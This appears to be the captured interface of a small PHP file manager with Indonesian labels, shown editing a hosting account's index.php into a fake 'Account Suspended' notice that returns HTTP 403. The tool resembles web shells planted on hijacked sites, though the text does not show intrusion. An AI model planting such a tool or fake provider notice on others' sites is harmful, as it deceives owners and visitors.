PATH: //home/hwyuvbry/pelanggan.waroenkhoki123.web.id
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 .htaccess
↓
X
📁 .well-known/
X
📄 index.php
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: index.php
<?php http_response_code(403); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Account Suspended</title> <style> body{ margin:0; background:#ffffff; font-family:Tahoma, Arial, sans-serif; color:#333; } .wrapper{ max-width:760px; margin:60px auto; padding:30px; } .header{ display:flex; align-items:center; margin-bottom:20px; } .icon{ width:48px; height:48px; margin-right:15px; } h1{ font-size:28px; font-weight:normal; margin:0; } p{ font-size:14px; line-height:1.6; } ul{ margin-top:10px; padding-left:20px; } li{ font-size:14px; margin-bottom:5px; } .note{ margin-top:25px; font-size:13px; color:#666; } .footer{ margin-top:40px; font-size:12px; color:#888; } hr{ border:none; border-top:1px solid #ddd; margin:25px 0; } @media(max-width:600px){ .wrapper{ margin:20px; padding:10px; } h1{ font-size:22px; } } </style> </head> <body> <div class="wrapper"> <div class="header"> <svg class="icon" viewBox="0 0 24 24" fill="#2b6cb0"> <path d="M4 3h16a1 1 0 011 1v6a1 1 0 01-1 1H4a1 1 0 01-1-1V4a1 1 0 011-1zm0 10h16a1 1 0 011 1v6a1 1 0 01-1 1H4a1 1 0 01-1-1v-6a1 1 0 011-1z"/> </svg> <h1>Account Suspended</h1> </div> <p> Your site has been suspended. If you are the owner of this website, please contact your hosting provider for more information. </p> <hr> <p><strong>The reason could be:</strong></p> <ul> <li>You have not renewed your hosting service.</li> <li>Your website may contain prohibited or abusive content.</li> </ul> <div class="note"> Please note that services which remain expired for more than 14 days may be terminated permanently. You may renew your hosting service to restore access. </div> <div class="footer"> Web Server </div> </div> </body> </html>
SIMPAN PERUBAHAN